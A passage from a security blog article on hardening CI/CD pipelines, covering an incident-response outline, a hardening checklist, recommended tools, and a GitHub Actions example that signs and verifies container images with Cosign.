<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="5-detection--incident-response-playbook-outline">5) Detection &amp; incident response (playbook outline)<a href="#5-detection--incident-response-playbook-outline" class="hash-link" aria-label="Direct link to 5) Detection &amp; incident response (playbook outline)" title="Direct link to 5) Detection &amp; incident response (playbook outline)" translate="no">​</a></h3>
<p><strong>Detect</strong></p>
<ul>
<li class="">
<p>Alerts from secret scanners (Gitleaks) on PRs/commits.</p>
</li>
<li class="">
<p>Unexpected runner activity: large archive uploads, unknown outbound connections, process dumping.</p>
</li>
<li class="">
<p>Registry events: unexpected uploads, re-tagging of<code>latest</code>.</p>
</li>
</ul>
<p><strong>Contain</strong></p>
<ul>
<li class="">
<p>Revoke compromised runner role (IAM).</p>
</li>
<li class="">
<p>Disable unhealthy runner pools and spin up clean ephemeral runners.</p>
</li>
<li class="">
<p>Revoke and rotate any exposed credentials (use automation via Vault/AWS).</p>
</li>
</ul>
<p><strong>Investigate</strong></p>
<ul>
<li class="">
<p>Triage commits/PRs, review CI logs, pull worker job details.</p>
</li>
<li class="">
<p>Check artifact signatures and SBOMs — find divergence point.</p>
</li>
<li class="">
<p>Review access logs (Git provider, artifact registry, cloud audit logs).</p>
</li>
</ul>
<p><strong>Recover</strong></p>
<ul>
<li class="">
<p>Restore artifacts from signed / verified builds.</p>
</li>
<li class="">
<p>Rebuild pipeline from audited code.</p>
</li>
<li class="">
<p>Rotate and enforce new short-lived credentials.</p>
</li>
</ul>
<p><strong>Postmortem</strong></p>
<ul>
<li class="">Add new policies/tests, tighten permission scope, and run red-team tests simulating the same vector.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="6-practical-checklist-apply-this-week">6) Practical checklist (apply this week)<a href="#6-practical-checklist-apply-this-week" class="hash-link" aria-label="Direct link to 6) Practical checklist (apply this week)" title="Direct link to 6) Practical checklist (apply this week)" translate="no">​</a></h3>
<ul>
<li class="">
<p>Require pull-request reviews for any workflow / pipeline file changes.</p>
</li>
<li class="">
<p>Enable OIDC and retire long-lived cloud keys for CI.</p>
</li>
<li class="">
<p>Integrate secret scanning (Gitleaks) into PR validation.</p>
</li>
<li class="">
<p>Generate SBOMs for builds (Syft) and scan with Grype/Trivy.</p>
</li>
<li class="">
<p>Sign all artifacts with Cosign / Sigstore. Verify signatures during deploy.</p>
</li>
<li class="">
<p>Use ephemeral runners in k8s — destroy and rebuild regularly.</p>
</li>
<li class="">
<p>Block access to<code>/var/run/docker.sock</code>(use kaniko/buildah).</p>
</li>
<li class="">
<p>Centralize logs and create CI-specific detection rules (e.g., many outbound connections from runner).</p>
</li>
<li class="">
<p>Run a scheduled dependency audit and enable automated updates (Dependabot / Renovate).</p>
</li>
<li class="">
<p>Perform a “CI/CD Threat Model” and run tabletop exercises.</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="7-recommended-tool-stack-fast-reference">7) Recommended tool stack (fast reference)<a href="#7-recommended-tool-stack-fast-reference" class="hash-link" aria-label="Direct link to 7) Recommended tool stack (fast reference)" title="Direct link to 7) Recommended tool stack (fast reference)" translate="no">​</a></h3>
<ul>
<li class="">
<p><strong>Secrets</strong>: HashiCorp Vault, AWS Secrets Manager, Azure Key Vault</p>
</li>
<li class="">
<p><strong>SBOM / artifact signing</strong>: Syft, Grype, Trivy, Cosign / Sigstore</p>
</li>
<li class="">
<p><strong>Static/security scanning</strong>: Checkov, tfsec, Gitleaks, Snyk, CodeQL</p>
</li>
<li class="">
<p><strong>Build tools safer than docker.sock</strong>: Kaniko, buildah, Podman</p>
</li>
<li class="">
<p><strong>Runners orchestration</strong>: Kubernetes (ephemeral pods), act-runner-controller (GitHub), GitLab Runner in k8s</p>
</li>
<li class="">
<p><strong>Detection</strong>: Falco (container activity), XPLG/ ELK / Splunk / Prometheus + Xpolog (metrics)</p>
</li>
<li class="">
<p><strong>Policy &amp; gating</strong>: OPA / Gatekeeper, Conftest, GitHub branch protections</p>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="8-example-enforce-oidc--cosign-verification-in-github-actions">8) Example: enforce OIDC + Cosign verification in GitHub Actions<a href="#8-example-enforce-oidc--cosign-verification-in-github-actions" class="hash-link" aria-label="Direct link to 8) Example: enforce OIDC + Cosign verification in GitHub Actions" title="Direct link to 8) Example: enforce OIDC + Cosign verification in GitHub Actions" translate="no">​</a></h3>
<p><strong>1) Use OIDC to get AWS role</strong>(see snippet above).
<strong>2) Sign image with Cosign in the build job</strong>:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">- name: Sign image</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">  run: |</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">    cosign sign --key </span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">${{ secrets.COSIGN_KEY }</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">} ghcr.io/org/myimage:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">${{ github.sha }</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">}</span><br></div></code></pre></div></div>
<p><strong>3) Verify signature in deploy job</strong>:</p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><div class="token-line" style="color:#393A34"><span class="token plain">- name: Verify signature</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">  run: |</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">    cosign verify --key cosign.pub ghcr.io/org/myimage:</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">${{ github.sha }</span><br></div><div class="token-line" style="color:#393A34"><span class="token plain">}</span><br></div></code></pre></div></div>
<p><em>(Prefer using a remote key management pattern with Cosign KMS integrations rather than storing private keys in repo secrets)</em></p>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="conclusion--stop-thinking-of-cicd-as-less-important">Conclusion — stop thinking of CI/CD as “less important”<a href="#conclusion--stop-thinking-of-cicd-as-less-important" class="hash-link" aria-label="Direct link to Conclusion — stop thinking of CI/CD as “less important”" title="Direct link to Conclusion — stop thinking of CI/CD as “less important”" translate="no">​</a></h2>
<p>CI/CD systems are no longer peripheral tooling — they are critical infrastructure. The modern attacker knows this and will target the weakest links: misconfigured runners, exposed secrets, unsigned artifacts, and lenient pipeline policies. Defend by combining<strong>least privilege</strong>,<strong>ephemeral infrastructure</strong>,<strong>supply-chain integrity (SBOM + signing)</strong>, and<strong>proactive detection</strong>.</p></div></article><nav class="docusaurus-mt-lg pagination-nav" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/medium-blog-navigation/docs/articles/2025/2025-10-13-villager-the-ai-powered-penetration-testing-framework-8df10532e265"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Villager: The AI-Powered Penetration Testing Framework</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/medium-blog-navigation/docs/articles/2025/2025-10-18-automating-a-safe-dvwa-lab-with-ansible-build-a-reproducible-vulnerable-environment-for-tr-026d74697c4a"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">Automating a Safe DVWA Lab with Ansible: Build a Reproducible Vulnerable Environment for Training…</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#ecosystem-fit" class="table-of-contents__link toc-highlight">Ecosystem Fit</a><ul><li><a href="#how-adversaries-weaponize-build-systems--and-the-concrete-tools--controls-you-can-use-to-stop-them" class="table-of-contents__link toc-highlight">How adversaries weaponize build systems — and the concrete tools &amp; controls you can use to stop them</a></li></ul></li><li><a href="#quick-roadmap" class="table-of-contents__link toc-highlight">Quick roadmap</a></li><li><a href="#1-why-cicd-is-so-valuable-to-attackers" class="table-of-contents__link toc-highlight">1) Why CI/CD is so valuable to attackers</a></li><li><a href="#2-attack-vectors--detailed-with-examples" class="table-of-contents__link toc-highlight">2) Attack vectors — detailed, with examples</a><ul><li><a href="#a-workflow--pipeline-injection-eg-github-actions-gitlab-ci" class="table-of-contents__link toc-highlight">A. Workflow / pipeline injection (e.g., GitHub Actions, GitLab CI)</a></li><li><a href="#b-dependencyregistry-poisoning-typosquatting-dependency-confusion" class="table-of-contents__link toc-highlight">B. Dependency/registry poisoning (typosquatting, dependency confusion)</a></li><li><a href="#c-secret-leakage-hardcoded-tokens--env-vars" class="table-of-contents__link toc-highlight">C. Secret leakage (hardcoded tokens / env vars)</a></li><li><a href="#d-build-agent-takeover-docker-socket-vulnerable-base-images" class="table-of-contents__link toc-highlight">D. Build agent takeover (docker socket, vulnerable base images)</a></li><li><a href="#e-artifact-repository-compromise-nexus-artifactory-github-packages" class="table-of-contents__link toc-highlight">E. Artifact repository compromise (Nexus, Artifactory, GitHub Packages)</a></li><li><a href="#3-defenses--concrete-tools-configs--examples" class="table-of-contents__link toc-highlight">3) Defenses — concrete tools, configs &amp; examples</a></li><li><a href="#identity--credentials-short-lived-auditable-tokens" class="table-of-contents__link toc-highlight">Identity &amp; credentials: short-lived, auditable tokens</a></li><li><a href="#secrets-management" class="table-of-contents__link toc-highlight">Secrets management</a></li><li><a href="#supply-chain-integrity" class="table-of-contents__link toc-highlight">Supply-chain integrity</a></li><li><a href="#pipeline-hardening--policy" class="table-of-contents__link toc-highlight">Pipeline hardening &amp; policy</a></li><li><a href="#static--dynamic-analysis-tooling" class="table-of-contents__link toc-highlight">Static &amp; dynamic analysis (tooling)</a></li><li><a href="#protect-runners--build-hosts" class="table-of-contents__link toc-highlight">Protect runners / build hosts</a></li><li><a href="#logging-detection--runtime-controls" class="table-of-contents__link toc-highlight">Logging, detection &amp; runtime controls</a></li><li><a href="#4-example-defenses-in-a-flow--an-end-to-end-sequence" class="table-of-contents__link toc-highlight">4) Example defenses in a flow — an end-to-end sequence</a></li><li><a href="#5-detection--incident-response-playbook-outline" class="table-of-contents__link toc-highlight">5) Detection &amp; incident response (playbook outline)</a></li><li><a href="#6-practical-checklist-apply-this-week" class="table-of-contents__link toc-highlight">6) Practical checklist (apply this week)</a></li><li><a href="#7-recommended-tool-stack-fast-reference" class="table-of-contents__link toc-highlight">7) Recommended tool stack (fast reference)</a></li><li><a href="#8-example-enforce-oidc--cosign-verification-in-github-actions" class="table-of-contents__link toc-highlight">8) Example: enforce OIDC + Cosign verification in GitHub Actions</a></li></ul></li><li><a href="#conclusion--stop-thinking-of-cicd-as-less-important" class="table-of-contents__link toc-highlight">Conclusion — stop thinking of CI/CD as “less important”</a></li></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Ecosystem</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://1200km.com/cti-analyst-field-manual/" target="_blank" rel="noopener noreferrer" class="footer__link-item">CTI Analyst Field Manual<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/CTI_as_a_Code/" target="_blank" rel="noopener noreferrer" class="footer__link-item">CTI as a Code<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/operation-desert-hydra/" target="_blank" rel="noopener noreferrer" class="footer__link-item">Operation Desert Hydra<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/customer-driven-ai-cti-project/" target="_blank" rel="noopener noreferrer" class="footer__link-item">Customer-Driven AI CTI<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/israel-government-threat-actors-cti/" target="_blank" rel="noopener noreferrer" class="footer__link-item">Israel Threat Actors CTI<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/ai-vs-defense/" target="_blank" rel="noopener noreferrer" class="footer__link-item">AI vs Defense<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://github.com/0x4m4/hexstrike-ai" target="_blank" rel="noopener noreferrer" class="footer__link-item">HexStrike AI<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/adversarygraph-docs/" target="_blank" rel="noopener noreferrer" class="footer__link-item">AdversaryGraph Docs<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Author</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://medium.com/@1200km" target="_blank" rel="noopener noreferrer" class="footer__link-item">Medium<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://github.com/anpa1200" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://www.linkedin.com/in/andrey-pautov/" target="_blank" rel="noopener noreferrer" class="footer__link-item">LinkedIn<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://1200km.com/" target="_blank" rel="noopener noreferrer" class="footer__link-item">Main Page<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Navigate</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/medium-blog-navigation/">Main Navigator</a></li><li class="footer__item"><a class="footer__link-item" href="/medium-blog-navigation/docs/analysis">Blog Analysis</a></li><li class="footer__item"><a class="footer__link-item" href="/medium-blog-navigation/docs/reading-paths">Reading Paths</a></li><li class="footer__item"><a class="footer__link-item" href="/medium-blog-navigation/docs/articles">Article Archive</a></li><li class="footer__item"><a class="footer__link-item" href="/medium-blog-navigation/docs/labs">Labs</a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">Profiles</div><ul class="footer__items clean-list"><li class="footer__item"><a href="https://medium.com/@1200km" target="_blank" rel="noopener noreferrer" class="footer__link-item">Medium<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://github.com/anpa1200" target="_blank" rel="noopener noreferrer" class="footer__link-item">GitHub<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li><li class="footer__item"><a href="https://www.linkedin.com/in/andrey-pautov/" target="_blank" rel="noopener noreferrer" class="footer__link-item">LinkedIn<svg width="13.5" height="13.5" aria-label="(opens in new tab)" class="iconExternalLink_nPIU"><use href="#theme-svg-external-link"></use></svg></a></li></ul></div></div><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2026 Andrey Pautov. Built with Docusaurus.</div></div></div></footer></div>
</body>
</html>